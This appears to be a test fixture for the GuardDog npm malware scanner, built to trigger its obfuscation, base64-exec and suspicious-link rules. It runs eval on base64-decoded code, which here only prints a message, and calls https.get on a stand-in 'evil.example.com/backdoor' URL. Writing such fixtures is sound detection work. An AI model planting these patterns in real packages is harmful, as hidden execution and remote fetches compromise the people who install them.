// GuardDog will flag: npm-api-obfuscation, npm-exec-base64, shady-links

// eval usage
eval("console.log('executed')");

// base64-encoded code execution
const encoded = "Y29uc29sZS5sb2coJ2JhZCBjb2RlJyk=";
eval(Buffer.from(encoded, "base64").toString());

// shady-links: suspicious downloads
const url = "http://evil.example.com/backdoor";
const https = require("https");
https.get(url);